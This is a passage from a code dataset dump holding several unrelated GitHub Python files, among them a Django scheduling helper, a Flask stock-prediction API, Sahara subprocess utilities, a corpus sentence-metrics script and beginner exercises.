c:\\Users\\PC\\wotsources\\files\\originals\\res\\scripts\\client\\gui\\scaleform\\daapi\\view\\lobby\\boosters\\boosterswindow.pyc \n# decompiled 1 files: 1 okay, 0 failed, 0 verify failed\n# 2015.11.18 11:53:29 Støední Evropa (bìžný èas)\n","repo_name":"webiumsk/WOT-0.9.12","sub_path":"res/scripts/client/gui/scaleform/daapi/view/lobby/boosters/boosterswindow.py","file_name":"boosterswindow.py","file_ext":"py","file_size_in_byte":10373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"11199651831","text":"from schedule.models import ScheduleTable\n\ndef getUnloadSid(iid):\n sTable = ScheduleTable.objects.filter(iid_id = iid)\n sList = []\n tList = []\n \n for 
st in sTable:\n        sList.extend(st.slist)\n        tList.extend(st.tflag)\n\n    indexOfTload = [] \n    \n    for idx, t in enumerate(tList):\n        if t == 1:\n            indexOfTload.append(idx)\n\n    unloadSid = []\n\n    for i in indexOfTload:\n        unloadSid.append(sList[i])\n\n    return unloadSid\n\ndef getTflag(sidlist, unloadSidList): \n\n    temp_tflag = [0] * len(sidlist) \n\n    for idx,sid in enumerate(sidlist):\n        for unloadSid in unloadSidList:\n            if unloadSid == int(sid):\n                temp_tflag[idx] = 1\n    \n    return temp_tflag\n","repo_name":"alswo/django_project","sub_path":"schedule/maintainTodayLoad.py","file_name":"maintainTodayLoad.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15242353234","text":"from bitmovin.resources import AbstractCustomDataResource\n\n\nclass CustomData(AbstractCustomDataResource):\n\n    def __init__(self, created_at, modified_at, custom_data):\n        super().__init__(custom_data=custom_data)\n        self.createdAt = created_at\n        self.modifiedAt = modified_at\n\n    @classmethod\n    def parse_from_json_object(cls, json_object):\n        created_at = json_object.get('createdAt')\n        modified_at = json_object.get('modifiedAt')\n        data = json_object.get('customData')\n        custom_data = CustomData(created_at=created_at, modified_at=modified_at, custom_data=data)\n        return custom_data\n","repo_name":"bitmovin/bitmovin-python","sub_path":"bitmovin/resources/models/custom_data.py","file_name":"custom_data.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"40"} +{"seq_id":"7211390669","text":"'''\nMaior e Posição\n'''\n\nnumbers = []\n\nmaior = 0\nposicao = 0\n\nfor index in range(1, 101):\n    x = int(input())\n    numbers.append(x)\n\n    if x > maior:\n        maior = x\n        posicao = index\n\nprint(maior)\nprint(posicao)","repo_name":"demmorou/uri-answers","sub_path":"1080.py","file_name":"1080.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18168139875","text":"valores = []\r\nposmaior = 0\r\nposmenor = 0\r\nfor c in range(0, 5):\r\n    valores.append(int(input(f'valor na posição {c + 1}: ')))\r\n    if c == 0:\r\n        maior = menor = valores[c]\r\n    if valores[c] > maior:\r\n        maior = valores[c]\r\n    if valores[c] < menor:\r\n        menor = valores[c]\r\nfor cont in range(0, 5):\r\n    print(f'{valores[cont]} ', end='')\r\nprint()\r\nfor i, v in enumerate(valores):\r\n    if v == maior:\r\n        posmaior = i\r\nfor i, v in enumerate(valores):\r\n    if v == menor:\r\n        posmenor = i\r\nprint(f'O maior número foi {maior} e foi encontrado na posição {posmaior}')\r\nprint(f'O menor número foi {menor} e foi encontrado na posição {posmenor}')\r\n\r\n","repo_name":"Rodrigocalaca/pythonExercicios3","sub_path":"ex078.py","file_name":"ex078.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"pt","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"12882973223","text":"def sort_with_custom_orders(values, key=lambda x: x, prefix_orders=None, suffix_orders=None):\n    from collections import defaultdict\n\n    if not prefix_orders:\n        prefix_orders = []\n    prefix_orders = list(prefix_orders)\n    prefix_orders_set = set(prefix_orders)\n\n    if len(prefix_orders) != len(prefix_orders_set):\n        raise ValueError('prefix_order contains duplicated values')\n\n    if not suffix_orders:\n        suffix_orders = []\n    suffix_orders = list(suffix_orders)\n    suffix_orders_set = 
set(suffix_orders)\n\n if len(suffix_orders) != len(suffix_orders_set):\n raise ValueError('suffix_orders contains duplicated values')\n\n if prefix_orders_set.intersection(suffix_orders_set):\n # have some values in both prefix and suffix\n raise ValueError('prefix and suffix contains same value')\n\n order_map = defaultdict(lambda: 1)\n for idx, item in enumerate(prefix_orders):\n order_map[item] = idx - len(prefix_orders)\n\n for idx, item in enumerate(suffix_orders, start=2):\n order_map[item] = idx\n\n sorted_values = sorted(values, key=lambda x: (order_map[key(x)], key(x)))\n\n return sorted_values\n\n\nif __name__ == '__main__':\n values = ['h2', 'h1', 't2', 't1', 'B', 'a', 'Y', 'x']\n\n assert sorted(values) == ['B', 'Y', 'a', 'h1', 'h2', 't1', 't2', 'x']\n assert sorted(values, key=str.lower) == ['a', 'B', 'h1', 'h2', 't1', 't2', 'x', 'Y']\n\n # h (h1, h2) stands for headers, t (t1, t2) stands for tails\n sorted_values = sort_with_custom_orders(values, key=str.lower,\n prefix_orders=['h1', 'h2', 'h3'],\n suffix_orders=['t1', 't2', 't3'])\n\n assert sorted_values == ['h1', 'h2', 'a', 'B', 'x', 'Y', 't1', 't2']\n \n class Person:\n def __init__(self, name):\n self.name = name\n\n\n def __eq__(self, other):\n if not isinstance(other, Person):\n return False\n return self.name == other.name\n \n def __hash__(self):\n return hash(self.name)\n\n\n res = sort_with_custom_orders([Person('lml'), Person('xc'), Person('wyw')], key=lambda p: p.name, prefix_orders=['xc', 'lml'])\n assert res == [Person('xc'), Person('lml'), Person('wyw')]\n\n \n","repo_name":"albertmenglongli/ToolsLibrary","sub_path":"code_snippets/lists/custom_sort.py","file_name":"custom_sort.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"40"} +{"seq_id":"42875795342","text":"import numpy as np\nimport pandas as pd\nfrom flask import Flask\nfrom flask import jsonify\nfrom datetime import datetime\nfrom werkzeug.routing import BaseConverter, ValidationError\nimport logging\nimport nasdaqpredictor\nfrom nasdaqpredictor.model import Model\nfrom nasdaqpredictor.dataloader import DataTransformer, DataLoader\n\nLOGGER = logging.getLogger(__name__)\napp = Flask(__name__)\n\nloader = DataLoader('/nasdaq_tickers.csv',\n datetime(2000, 1, 1),\n datetime(2017, 1, 1))\ntransformer = DataTransformer(loader, return_shift_days=-2)\nmodel = Model(transformer,\n dev_date=datetime(2015, 1, 1),\n file_path='models/full_model_2017_11_22_11_07.hdf5')\n\n\nclass DateConverter(BaseConverter):\n regex = r'\\d{4}-\\d{2}-\\d{2}'\n\n def to_python(self, value):\n try:\n return datetime.strptime(value, '%Y-%m-%d').date()\n except ValueError:\n raise ValidationError()\n\n def to_url(self, value):\n return value.strftime('%Y-%m-%d')\n\n\napp.url_map.converters['date'] = DateConverter\n\n\n@app.route('/predict/<ticker>/<date:selected_date>', methods=['GET', 'POST'])\ndef predict(ticker, selected_date):\n log_msg = 'Predict {}, {}'.format(ticker, selected_date)\n LOGGER.info(log_msg)\n predicted = model.predict_one(ticker, selected_date)\n return jsonify(long_prediction=np.asscalar(predicted[0][0]),\n short_prediction=np.asscalar(predicted[0][1]))\n\n\n@app.route('/predict-range/<ticker>/<date:from_date>/<date:to_date>', methods=['GET', 'POST'])\ndef predict_range(ticker, from_date, to_date):\n log_msg = 'Predict {}, {} - {}'.format(ticker, from_date, to_date)\n LOGGER.info(log_msg)\n daterange = pd.date_range(from_date, to_date)\n dates_predictions = {}\n for 
single_date in daterange:\n try:\n predicted = model.predict_one(ticker, single_date)\n dates_predictions[single_date.strftime('%Y-%m-%d')] = predicted[0].tolist()\n except Exception as e:\n LOGGER.error(e)\n return jsonify(dates_predictions)\n\n\nif __name__ == '__main__':\n model.build_model_data()\n model.build_neural_net()\n app.run(port=80, host='0.0.0.0')\n","repo_name":"minimalgeek/DeepLearning","sub_path":"Stock/nasdaqpredictor/nasdaqpredictor/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"8546507460","text":"import logging\nimport os\nimport pickle\nimport sys\n\nfrom eventlet.green import subprocess\nfrom eventlet import timeout as e_timeout\n\nfrom sahara import context\n\n\nLOG = logging.getLogger(__name__)\n\n\ndef _get_sub_executable():\n return '%s/_sahara-subprocess' % os.path.dirname(sys.argv[0])\n\n\ndef start_subprocess():\n return subprocess.Popen((sys.executable, _get_sub_executable()),\n close_fds=True,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n\ndef run_in_subprocess(proc, func, args=(), kwargs={}):\n try:\n pickle.dump(func, proc.stdin)\n pickle.dump(args, proc.stdin)\n pickle.dump(kwargs, proc.stdin)\n proc.stdin.flush()\n\n result = pickle.load(proc.stdout)\n\n if 'exception' in result:\n raise SubprocessException(result['exception'])\n\n return result['output']\n finally:\n # NOTE(dmitryme): in openstack/common/processutils.py it\n # is suggested to sleep a little between calls to multiprocessing.\n # That should allow it make some necessary cleanup\n context.sleep(0)\n\n\ndef _finish(cleanup_func):\n cleanup_func()\n sys.stdin.close()\n sys.stdout.close()\n sys.stderr.close()\n sys.exit(0)\n\n\ndef shutdown_subprocess(proc, cleanup_func):\n try:\n with e_timeout.Timeout(5):\n # timeout would mean that our single-threaded subprocess\n # is hung on previous task which blocks _finish to complete\n run_in_subprocess(proc, _finish, (cleanup_func,))\n except BaseException:\n # exception could be caused by either timeout, or\n # successful shutdown, ignoring anyway\n pass\n finally:\n kill_subprocess(proc)\n\n\ndef kill_subprocess(proc):\n proc.stdin.close()\n proc.stdout.close()\n proc.stderr.close()\n\n try:\n proc.kill()\n except OSError:\n # could be caused by process already dead, so ignoring\n pass\n\n\nclass SubprocessException(Exception):\n def __init__(self, e):\n super(SubprocessException, self).__init__(e)\n","repo_name":"mapr/sahara","sub_path":"sahara/utils/procutils.py","file_name":"procutils.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34820033422","text":"def multi_values(*args):\n print(args)\n return args\ntuple1 = multi_values(1,1,2,3,4)\nprint(tuple1)\nlist_date = [1,2,32,3,6]\nmulti_values(*list_date)\n\ndef multi_value(**kwargs):\n print(kwargs)\n return kwargs\ndict = {'性别':'男'}\nmulti_value(**dict)\n\nresult = lambda x : x*2\nprint(result(8))\na = 1\nb = 2\nresult2 = 'a大于b' if a > b else 'a小于b'\nprint(result2)\nexam_result = {'张无忌':88,'赵敏':77,'蝙蝠侠':99,'超人':10000,'无名':55,'小明':38}\nexam_result2 = sorted(exam_result.items(),key = lambda d : d[1],reverse = False)\nprint(exam_result2,type(exam_result2))\ndict = {}\nfor i in exam_result2:\n dict[i[0]] = 
i[1]\nprint(dict,type(dict))\n\n\n\n","repo_name":"wangyandong1/test_demo","sub_path":"function_date.py","file_name":"function_date.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14985579290","text":"import sys\nfrom PyQt4 import QtGui, QtCore\n\nclass Window(QtGui.QMainWindow):\n def __init__(self):\n super(Window, self).__init__()\n self.setGeometry(50, 50, 600, 300)\n self.setWindowTitle(\"Second lecture practice\")\n self.setWindowIcon(QtGui.QIcon('logo.png'))\n self.home()\n\n def home(self):\n btn = QtGui.QPushButton(\"Quit\", self)\n btn.clicked.connect(self.close_application)\n btn.resize(btn.minimumSizeHint())\n btn.move(100, 100)\n\n self.show()\n\n def close_application(self):\n print(\"Hello World!\")\n self.setWindowTitle(\"Seriously!\")\n\n # sys.exit()\n\ndef run():\n app = QtGui.QApplication(sys.argv)\n GUI = Window()\n sys.exit(app.exec_())\n\nrun()","repo_name":"Sanzidikawsar/PyQt-practice-with-sentdex","sub_path":"lec-4.py","file_name":"lec-4.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18026231610","text":"import typing as T\n\nimport numpy as np\nimport pytest\n\npd = pytest.importorskip(\"pandas\")\n\nfrom pdbufr import read_bufr\n\nassert_frame_equal = pd.testing.assert_frame_equal\n\n\ndef build_message_list() -> T.Any:\n messages = [\n {\n \"edition\": 3,\n \"masterTableNumber\": 0,\n \"numberOfSubsets\": 1,\n \"unexpandedDescriptors\": 0,\n \"blockNumber\": 1,\n \"stationNumber\": 128,\n \"airTemperature\": 289.7,\n \"dewpointTemperature\": 285.16,\n },\n {\n \"edition\": 4,\n \"masterTableNumber\": 1,\n \"numberOfSubsets\": 1,\n \"unexpandedDescriptors\": 1,\n \"stationNumber\": 129,\n \"airTemperature\": 249.1,\n \"dewpointTemperature\": 140.12,\n },\n ]\n\n class _Msg:\n def __init__(self, d: T.Any) -> None:\n self.d = d\n self.codes = {\n \"blockNumber\": 1001,\n \"stationNumber\": 1002,\n \"airTemperature\": 12001,\n \"dewpointTemperature\": 12003,\n }\n\n def __enter__(self) -> T.Any:\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb) -> None: # type: ignore\n pass\n\n def __iter__(self) -> T.Any:\n return iter(self.d)\n\n def __getitem__(self, key: str) -> T.Any:\n return self.d[key]\n\n def __setitem__(self, key: str, value: T.Any) -> None:\n self.d[key] = value\n\n def is_coord(self, key: str) -> bool:\n code = self.codes.get(key, None)\n return code is not None and code < 9999\n\n class _MsgList:\n def __init__(self, d: T.Any) -> None:\n self.d = d\n\n def __iter__(self) -> T.Any:\n return iter(self.d)\n\n lst = _MsgList([_Msg(messages[0]), _Msg(messages[1])])\n return lst\n\n\ndef test_message_list_1() -> None:\n lst = build_message_list()\n res = read_bufr(lst, columns=(\"airTemperature\"))\n\n ref = {\"airTemperature\": np.array([289.7, 249.1])}\n ref = pd.DataFrame.from_dict(ref)\n\n assert_frame_equal(res, ref)\n\n\ndef test_message_list_2() -> None:\n lst = build_message_list()\n res = read_bufr(lst, columns=(\"airTemperature\"), filters={\"stationNumber\": 129})\n\n ref = {\"airTemperature\": np.array([249.1])}\n ref = pd.DataFrame.from_dict(ref)\n\n assert_frame_equal(res, 
ref)\n","repo_name":"ecmwf/pdbufr","sub_path":"tests/test_70_message_list.py","file_name":"test_70_message_list.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"40"} +{"seq_id":"30862994934","text":"from openpyxl import Workbook\nfrom openpyxl import load_workbook\nimport sys\nimport chardet\nimport sqlite3\n\n#导入Excel文件\ndest_filename = '选题名单.xlsx'\nexcel = load_workbook(dest_filename)\nexcel_wb = excel.active\n\n#获取最大行数\nprint (\"Max_row\",excel_wb.max_row)\nMaxiumRow = excel_wb.max_row+1\ncount_mianshi =0;\ncount_kaiti = 0;\ncount_cansai = 0;\n\n#连接到数据库\ndbconn = sqlite3.connect(\"stu.db\")\n\n#创建一个游标\ncursor = dbconn.cursor()\n\n#创建stuinfo 表\n#sql = \"\"\n#cursor.execute(sql)\n\nselect = \"select * from stuinfo limit 1 offset (select count(*) - 1 from stuinfo)\"\n #\"select * from stuinfo order by 'index' desc limit 0,1\"\ncursor.execute(select)\nvalues = cursor.fetchone()\n#print(values)\nMaxiumIndex = str(int(values[0]) + 1)\n#print (MaxiumIndex)\n\n\n#按行遍历excel文件\nfor row in range(2,MaxiumRow):\n #print(excel_wb.cell(row=row,column=1).value)\n #读取ID\n stu_no=excel_wb.cell(row=row,column=1).value\n #print(\"ID\",stu_no)\n #读取Name\n stu_name=excel_wb.cell(row=row,column=2).value\n #读取class\n stu_class=excel_wb.cell(row=row,column=5).value\n\n #读取 Status 和 Title, 注意可能为空\n detial_info=excel_wb.cell(row=row,column=9).value\n\n if not(detial_info is None) :\n #detial_info.replace(\",\",\",\")\n #detial_info.replace(\".\",\",\")\n #detial_info.replace(\" \",\"\")\n\n #分割信息,得到 status 和 title\n if detial_info.count(\",\") == 1:\n stu_type = detial_info.split(\",\", 2)[0]\n title= detial_info.split(\",\",2)[1]\n elif detial_info.count(\",\") == 2:\n stu_type = detial_info.split(\",\", 3)[0]\n title = detial_info.split(\",\", 3)[1] + \":\" + detial_info.split(\",\", 3)[2]\n else:\n print (\"ID:\",stu_no,\"信息错误\")\n stu_type = \"Error\"\n title=\"Error\"\n #print(stu_type,title)\n\n selectbyid = \"select * from stuinfo where id = ?\"\n # select = \"select * from stuinfo\"\n # cursor.execute(select)\n cursor.execute(selectbyid,(stu_no,))\n value = cursor.fetchone()\n #print(value)\n\n if (value is None):\n #如果没有,则新增加一条记录\n sqlinsert = \"INSERT INTO stuinfo('index',id,name,class,status,title) VALUES (?,?,?,?,?,?)\"\n data = (MaxiumIndex,stu_no,stu_name,stu_class,stu_type,title)\n print(\"Insert ID\",stu_no,\"to Index:\",MaxiumIndex)\n MaxiumIndex = str(int(MaxiumIndex) + 1)\n\n #print(sqlinsert)\n #print(MaxiumIndex)\n #print(data)\n cursor.execute(sqlinsert, data)\n else:\n #如果存在,则修改原来记录\n #print(value)\n sqlupdate = \"update stuinfo set status=?, title=? 
where id =?\"\n        cursor.execute(sqlupdate, (stu_type,title,stu_no))\n        print(\"Update ID\",stu_no,\"at Index:\",value[0])\n        #print(sqlupdate)\n    dbconn.commit()\n\ndbconn.commit()\ndbconn.close()","repo_name":"bd9bkc/Excel2Sqlite","sub_path":"Excel2Sqlite.py","file_name":"Excel2Sqlite.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27801368816","text":"\"\"\"\nEric Nordstrom\nPython 3.6.0\n2/5/2018\n\nGet metrics on each sentence of a corpus individually.\n\"\"\"\n\n\nfrom copy import copy\nfrom itertools import tee\nimport logging\nSTARTS = -1 # markers on first token of sentence\nENDS = 0 # markers on last token of sentence\nmarker_type = ENDS # adjust this according to data\n\n# logging setup\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s:%(levelname)s:%(message)s')\nlogging.LBL = 5 # line-by-line: more verbose than DEBUG as it logs on every line of data\nlogging.addLevelName(logging.LBL, 'LBL')\nlogging.lbl = lambda msg, *args, **kwargs: logging.log(logging.LBL, msg, *args, **kwargs)\n\n\ndef metrics(funcs, args, markers):\n    '''\\\ngenerator of generators for the result of each function on each sentence\n`args`: lang & POS values for each token\n`markers`: indices indicating sentence marker locations\\\n    '''\n\n    # debugging\n    try:\n        LA = len(args)\n    except TypeError:\n        LA = 'N/A'\n    try:\n        LM = len(markers)\n    except TypeError:\n        LM = 'N/A'\n    logging.debug('''\\\nmetrics: Executing with the following inputs:\n    Functions: {}\n    Lang & POS args of type {}\n    Number of lang/POS arg rows: {}\n    Markers of type {}\n    Number of markers: {}\\\n'''.format(funcs, type(args), LA, type(markers), LM))\n\n    def lbl(sent):\n        if logging.LBL >= logging.getLogger().level:\n            msg = 'metrics: Sentence:\\n'\n            for line in sent:\n                msg += '\\t{}\\n'.format(line)\n            logging.lbl(msg)\n\n    # setup\n    ai, mi = iter(args), iter(markers)\n    try: # test whether `funcs` is iterable\n        for func in copy(funcs):\n            break\n    except TypeError:\n        funcs = {funcs} # assert iterability\n    if marker_type is STARTS: # skip first marker if right at beginning\n        mi, mi_peek = tee(mi) # tee() allows peeking; copy() raises TypeError when `markers` is a generator\n        if not next(mi_peek):\n            logging.debug('Skipping first marker...')\n            next(mi)\n\n    # compute bulk\n    i = 0\n    for marker in mi:\n        sent = []\n        while i <= marker + marker_type:\n            sent.append(next(ai))\n            i += 1\n        lbl(sent)\n        yield (func(sent) for func in funcs)\n\n    # might have one more sentence if no marker at end\n    lastsent = []\n    end = False\n    while not end:\n        try:\n            lastsent.append(next(ai))\n            i += 1\n        except StopIteration:\n            end = True\n    if lastsent:\n        lbl(lastsent)\n        yield (func(lastsent) for func in funcs)\n\n\ndef get_marker_indices(lines, marker_col=None, marker=None):\n    '''extract markers as a series of row/token indices'''\n\n    # debugging\n    try:\n        L = len(lines)\n    except TypeError:\n        L = 'N/A'\n    logging.debug('''\\\nget_marker_indices: Executing with the following inputs...\n    Lines of type {}\n    Number of lines: {}\n    Marker column: {}\n    Marker: {}\\\n'''.format(type(lines), L, marker_col, marker))\n\n    # establish marker column\n    if marker_col is None:\n        row1 = next(iter(copy(lines))) # copy() of a list is not an iterator, so wrap it in iter() before calling next()\n        logging.warning('No marker column specified. 
Setting marker column to {}...'.format(len(row1) - 1))\n try:\n marker_col = len(row1) - 1 # assume marker column is the last column\n except TypeError:\n pass # rows found not to be subscriptable\n\n # create marker detection function\n if marker:\n def md(val):\n return val == marker\n else:\n def md(val):\n return val\n\n # create marker column value function\n if marker_col is None:\n def mcv(row):\n return row\n else:\n def mcv(row):\n return row[marker_col]\n\n # compute\n for i, line in enumerate(lines):\n val = mcv(line)\n detected = md(val)\n logging.lbl('get_marker_indices: Row {}: {}: {}'.format(i, val, detected))\n if detected:\n yield i\n\n\ndef metric_args(lines, lang_col=None, POS_col=None):\n '''translate each line of data into a dict of lang and POS values'''\n\n # debugging\n try:\n L = len(lines)\n except TypeError:\n L = 'N/A'\n logging.debug('''\\\nmetric_args: Executing with the following inputs:\n Lines of type {}\n Number of lines: {}\n Language column: {}\n POS column: {}\\\n'''.format(type(lines), L, lang_col, POS_col))\n\n # compute\n for line in lines:\n args = {}\n if lang_col:\n args['lang'] = line[lang_col]\n if POS_col:\n args['POS'] = line[POS_col]\n logging.lbl('metrics_args: {}'.format(args))\n yield args\n\n\ndef preprocess(lines, delimiter):\n '''split each line by the delimiter'''\n logging.debug('preprocess: Splitting lines by delimiter {}...'.format(repr(delimiter)))\n for i, line in enumerate(lines):\n lines[i] = line.split(delimiter)\n\n\ndef file_metrics(funcs, file, delimiter, first_row=True, lang_col=None, POS_col=None, marker_col=None, marker=None):\n '''perform sentence-level metrics on file contents'''\n\n # debugging\n logging.debug('''\\\nfile_metrics: Executing with the following inputs:\n Functions: {}\n File: {}\n Delimiter: {}\n Language column: {}\n POS column: {}\\\n'''.format(funcs, file, delimiter, lang_col, POS_col))\n\n # setup\n logging.debug('file_metrics: Setting up...')\n lines = file.read().splitlines()\n if not first_row:\n logging.debug('file_metrics: Skipping first row...')\n lines.pop(0)\n preprocess(lines, delimiter)\n\n # extract args and markers\n logging.debug('file_metrics: Retrieving lang & POS args...')\n args = metric_args(lines, lang_col, POS_col)\n logging.debug('file_metrics: Locating sentence markers...')\n markers = get_marker_indices(lines, marker_col, marker)\n\n # compute metrics\n logging.debug('file_metrics: Computing metrics...')\n return metrics(funcs, args, markers)\n\n\ndef _ap_parser():\n '''set up and return the argparse parser'''\n import argparse\n logging.debug('_ap_parser: Creating argument parser...')\n parser = argparse.ArgumentParser(description='Sentence-level metrics on data with sentence markers.')\n parser.add_argument(\n 'input_file',\n help='corpus file with sentence markers'\n )\n parser.add_argument(\n 'lang_col',\n type=int,\n help='column containing language tags (0-indexed)'\n )\n parser.add_argument(\n 'POS_col',\n type=int,\n help='column containing POS tags (0-indexed)'\n )\n parser.add_argument(\n 'marker_col',\n type=int,\n help='column containing sentence markers (0-indexed)'\n )\n parser.add_argument(\n 'function_file',\n help='Python script containing function(s) to evaluate. Each function should take an argument of a list of dicts in the format {\"lang\": lang_val, \"POS\": POS_val}. If in separate files, must join into single file. 
The script must also have a variable called \"FUNCTIONS\" as a list containing the desired functions to calculate.'\n )\n parser.add_argument(\n '-m', '--marker',\n help='marker string. if not specified, only empty entries in the marker column are ignored.'\n )\n parser.add_argument(\n '-d', '--delimiter',\n default='\\t',\n help='delimiter between columns. default: Tab'\n )\n parser.add_argument(\n '-f', '--skip_first_row',\n action='store_true',\n help='specify if the first row of the input file contents is to be skipped'\n )\n parser.add_argument(\n '-mt', '--marker_type',\n default='ENDS',\n help='STARTS (first word of sentence) or ENDS (last word of sentence). default: ENDS'\n )\n parser.add_argument(\n '-e', '--encoding',\n default='utf8',\n help='encoding type of input file. default: utf8'\n )\n parser.add_argument(\n '-o', '--output_folder',\n default=orig_wd,\n help='location to save output file with metrics'\n )\n parser.add_argument(\n '-l', '--log_level',\n help='Change the log level. Default: INFO. Type \"LBL\" for line-by-line (lower than DEBUG)'\n )\n return parser\n\n\ndef main():\n '''for command line execution'''\n\n # set up\n print()\n import os\n from datetime import datetime as dt\n from csv import writer\n global orig_wd, marker_type\n orig_wd = os.getcwd()\n cmd_args = _ap_parser().parse_args()\n if cmd_args.log_level:\n print('Setting log level to {}...'.format(cmd_args.log_level.upper()))\n logging.getLogger().setLevel(eval('logging.' + cmd_args.log_level.upper()))\n logging.info('Setting up...')\n logging.debug('Setting marker type to {}...'.format(cmd_args.marker_type))\n marker_type = eval(cmd_args.marker_type)\n input_filename = cmd_args.input_file.split('\\\\')[-1]\n input_file_title, input_file_extn = tuple(input_filename.split('.'))\n output_filename = 'Metrics on {} ({}).{}'.format(input_file_title, dt.now(), input_file_extn)\n output_file = '{}\\\\{}'.format(cmd_args.output_folder, output_filename.replace(':', '.'))\n logging.debug('Output file will be: ' + output_file)\n\n # get function(s)\n logging.info('Retrieving functions...')\n input_file_parts = cmd_args.function_file.split('\\\\')\n logging.debug('Input file parts = {}'.format(input_file_parts))\n folder = '\\\\'.join(input_file_parts[:-1])\n logging.debug('Folder = ' + folder)\n filename = input_file_parts[-1]\n if filename.endswith('.py'):\n filename = filename[:-3]\n logging.debug('File name = ' + filename)\n if folder:\n os.chdir(folder)\n logging.debug('Changed directory to ' + os.getcwd())\n exec('from {} import FUNCTIONS as funcs'.format(filename), globals())\n logging.debug('Functions imported: {}'.format(funcs))\n os.chdir(orig_wd)\n logging.debug('Changed directory to ' + os.getcwd())\n logging.debug('Functions list: {}'.format(funcs))\n\n # load input file & make generator\n logging.info('Retrieving input file contents...')\n with open(cmd_args.input_file, encoding=cmd_args.encoding.lower()) as f:\n sent_metrics = file_metrics(funcs, f, cmd_args.delimiter, not cmd_args.skip_first_row, cmd_args.lang_col, cmd_args.POS_col, cmd_args.marker_col, cmd_args.marker)\n\n # compute & write to output file\n logging.info('Computing and writing to output file...')\n with open(output_file, 'w', encoding=cmd_args.encoding.lower(), newline='\\n') as f:\n writer = writer(f, delimiter='\\t')\n writer.writerow(['Sentence No.'] + [func.__name__ for func in funcs]) # headings\n for i, metrics in enumerate(sent_metrics):\n writer.writerow([i] + list(metrics))\n logging.info('Wrote to output file at ' + 
output_file)\n\n    print('\\nDone')\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Bilingual-Annotation-Task-Force/Scripts","sub_path":"Sentence Tokenization/sentence_metrics.py","file_name":"sentence_metrics.py","file_ext":"py","file_size_in_byte":10650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18561988152","text":"import datetime\n\nexp = { 'data': 'avenue', #st, avenue\n        'data_consecutive': True,\n        'model_name': 'bitrap', #lstm_network, bitrap, bitrap_640_360\n        'K': 1,\n        'plot_images':False # Plot images\n        }\n\n\nhyparams = {\n    'epochs': 1, #epoch for lstm model\n    'batch_size': 32,\n    'buffer_size': 10000,\n    \n    'input_seq':5,\n    'pred_seq':5,\n    'metric': 'l2', #giou,l2, ciou diou,iou\n    'avg_or_max': 'avg', #avg \n    'errortype': 'error_flattened', #'error_diff' or 'error_summed' or 'error_flattened'\n\n    'to_xywh': True, # This is assuming file is in tlbr format\n\n    'networks': {\n        'lstm':{\n            'loss':'mse',\n            'lr': 8.726e-06,\n            'early_stopping': True,\n            'mointor':'loss',\n            'min_delta': 0.00005,\n            'patience': 15,\n            'val_ratio': 0.3,\n            },\n\n        }\n\n}\n\nname_exp = 'traj_model'\n\nnow = datetime.datetime.now()\ndate = now.strftime(\"%m_%d_%Y\")\ntime = now.strftime(\"%H:%M:%S\")\n\nif exp['data_consecutive']:\n    model_path_list = ['results_all_datasets', 'experiment_{}'.format(name_exp), 'saved_model_consecutive']\n    metrics_path_list = ['results_all_datasets', 'experiment_{}'.format(name_exp), 'metrics_plot_consecutive']\n    visual_trajectory_list = ['results_all_datasets', 'experiment_{}'.format(name_exp), 'visual_trajectory_consecutive', '{}_{}_{}_{}_{}'.format(date, exp['data'], time, hyparams['input_seq'], hyparams['pred_seq'])]\n    \n    if exp['model_name'] == 'bitrap' or exp['model_name'] == 'bitrap_640_360' or exp['model_name'] == 'bitrap_1080_1020':\n        model_path_list = ['results_all_datasets', 'experiment_{}'.format(name_exp), 'saved_model_consecutive']\n        metrics_path_list = ['results_all_datasets', 'experiment_{}'.format(name_exp), 'metrics_plot_consecutive_bitrap']\n        visual_trajectory_list = ['results_all_datasets', 'experiment_{}'.format(name_exp), 'visual_trajectory_consecutive_bitrap', '{}_{}_{}_{}'.format(date, exp['data'], hyparams['input_seq'], hyparams['pred_seq'])]\n\nelse:\n    model_path_list = ['results_all_datasets', 'experiment_{}'.format(name_exp), 'saved_model']\n    metrics_path_list = ['results_all_datasets', 'experiment_{}'.format(name_exp), 'metrics_plot']\n    visual_trajectory_list = ['results_all_datasets', 'experiment_{}'.format(name_exp), 'visual_trajectory', '{}_{}_{}_{}_{}'.format(date, exp['data'], time, hyparams['input_seq'], hyparams['pred_seq'])]\n\n\nloc = {\n    # if I'm running a test where don't want to save anything\n    # how do I do that. 
